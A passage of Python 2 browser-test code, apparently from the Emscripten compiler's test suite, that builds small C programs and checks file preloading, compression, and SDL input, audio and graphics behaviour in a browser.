Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'somefile.txt', '--no-heap-copy', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT();
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print srcpath
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false);
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print path
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT();
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT();
return 0;
}
'''))
# by individual files
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_compressed_file(self):
open(os.path.join(self.get_dir(), 'datafile.txt'), 'w').write('compress this please' + (2000*'.'))
open(os.path.join(self.get_dir(), 'datafile2.txt'), 'w').write('moar' + (100*'!'))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[21];
FILE *f = fopen("datafile.txt", "r");
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("file says: |%s|\n", buf);
int result = !strcmp("compress this please", buf);
FILE *f2 = fopen("datafile2.txt", "r");
fread(buf, 1, 5, f2);
buf[5] = 0;
fclose(f2);
result = result && !strcmp("moar!", buf);
printf("file 2 says: |%s|\n", buf);
REPORT_RESULT();
return 0;
}
'''))
self.build_native_lzma()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'page.html', '--preload-file', 'datafile.txt', '--preload-file', 'datafile2.txt',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')]).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'datafile.txt')), 'must be data file'
assert os.path.exists(os.path.join(self.get_dir(), 'page.data.compress')), 'must be data file in compressed form'
assert os.stat(os.path.join(self.get_dir(), 'page.js')).st_size != os.stat(os.path.join(self.get_dir(), 'page.js.compress')).st_size, 'compressed file must be different'
shutil.move(os.path.join(self.get_dir(), 'datafile.txt'), 'datafile.txt.renamedsoitcannotbefound');
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_compressed(self):
for image, width in [(path_from_root('tests', 'screenshot2.png'), 300),
(path_from_root('tests', 'screenshot.jpg'), 600)]:
self.clear()
print image
basename = os.path.basename(image)
shutil.copyfile(image, os.path.join(self.get_dir(), basename))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.build_native_lzma()
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html',
'--preload-file', basename, '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="' + basename + '"',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')
]).communicate()
shutil.move(os.path.join(self.get_dir(), basename), basename + '.renamedsoitcannotbefound');
self.run_browser('page.html', '', '/report_result?' + str(width))
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'])
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_canvas(self):
open(os.path.join(self.get_dir(), 'sdl_canvas.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_canvas.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_canvas.c'), '-o', 'page.html', '-s', 'LEGACY_GL_EMULATION=1']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
doReftest();
setTimeout(windowClose, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt'], manual_reference=True, post_build=post)
def test_sdl_canvas_alpha(self):
self.btest('sdl_canvas_alpha.c', reference='sdl_canvas_alpha.png', reference_slack=1)
def test_sdl_key(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?740')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1')
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1')
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
def test_emscripten_get_now(self):
self.btest('emscripten_get_now.cpp', '1')
def test_file_db(self):
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret)
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-DFIRST', '-DSECRET=\'' + secret + '\'', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-DSECRET=\'' + secret + '\'', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js'])
def test_sdl_audio(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmcreatemiltaryfoot_1.wav'), os.path.join(self.get_dir(), 'sound2.wav'))
shutil.copyfile(path_from_root('tests', 'sounds', 'noise.ogg'), os.path.join(self.get_dir(), 'noise.ogg'))
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.ogg'), os.path.join(self.get_dir(), 'the_entertainer.ogg'))
open(os.path.join(self.get_dir(), 'bad.ogg'), 'w').write('I claim to be audio, but am lying')
open(os.path.join(self.get_dir(), 'sdl_audio.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio.c')).read()))
# use closure to check for a possible bug with closure minifying away newer Audio() attributes
Popen([PYTHON, EMCC, '-O2', '--closure', '1', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio.c'), '--preload-file', 'sound.ogg', '--preload-file', 'sound2.wav', '--embed-file', 'the_entertainer.ogg', '--preload-file', 'noise.ogg', '--preload-file', 'bad.ogg', '-o', 'page.html', '-s', 'EXPORTED_FUNCTIONS=["_main", "_play", "_play2"]']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_mix_channels(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'noise.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
open(os.path.join(self.get_dir(), 'sdl_audio_mix_channels.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio_mix_channels.c')).read()))
Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_mix_channels.c'), '--preload-file', 'sound.ogg', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_mix(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'pluck.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.ogg'), os.path.join(self.get_dir(), 'music.ogg'))
shutil.copyfile(path_from_root('tests', 'sounds', 'noise.ogg'), os.path.join(self.get_dir(), 'noise.ogg'))
open(os.path.join(self.get_dir(), 'sdl_audio_mix.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio_mix.c')).read()))
Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_mix.c'), '--preload-file', 'sound.ogg', '--preload-file', 'music.ogg', '--preload-file', 'noise.ogg', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_quickload(self):
open(os.path.join(self.get_dir(), 'sdl_audio_quickload.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio_quickload.c')).read()))
Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_quickload.c'), '-o', 'page.html', '-s', 'EXPORTED_FUNCTIONS=["_main", "_play"]']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_beeps(self):
open(os.path.join(self.get_dir(), 'sdl_audio_beep.cpp'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio_beep.cpp')).read()))
# use closure to check for a possible bug with closure minifying away newer Audio() attributes
Popen([PYTHON, EMCC, '-O2', '--closure', '1', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_beep.cpp'), '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--shell-file', path_from_root('tests', 'sdl_canvas_size.html'), '--preload-file', path_from_root('tests', 'screenshot.png') + '@/', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with gray at the top.')
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
